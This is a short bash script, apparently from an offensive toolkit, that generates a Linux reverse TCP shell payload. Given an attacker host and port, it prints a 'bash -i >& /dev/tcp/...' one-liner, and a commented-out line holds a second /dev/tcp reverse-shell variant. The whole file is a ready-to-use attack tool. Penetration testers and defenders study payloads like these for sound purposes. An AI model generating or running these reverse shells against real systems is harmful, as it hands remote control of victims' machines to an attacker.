#!/bin/bash

function Craft_bash_reverse_shell(){

        if [ -z "$1" ] || [ -z "$2" ]
        then
                printf "Auto-gen Linux bash reverse tcp shell\n"
                printf "Usage bash linux_bash-reverse-tcp <rhost> <rport>\n"
                exit
        fi

        rhost="$1"
        rport="$2"

	printf "\n"
	printf "bash -i >& /dev/tcp/$rhost/$rport 0>&1"
#	printf "/bin/bash -c 'exec 5<>/dev/tcp/$rhost/$rport;cat <&5 | while read line; do $line 2>&5 >&5; done'"
	printf "\n\n[\e[0;32m+\e[0m] Payload created.\n"

}

Craft_bash_reverse_shell "$1" "$2"
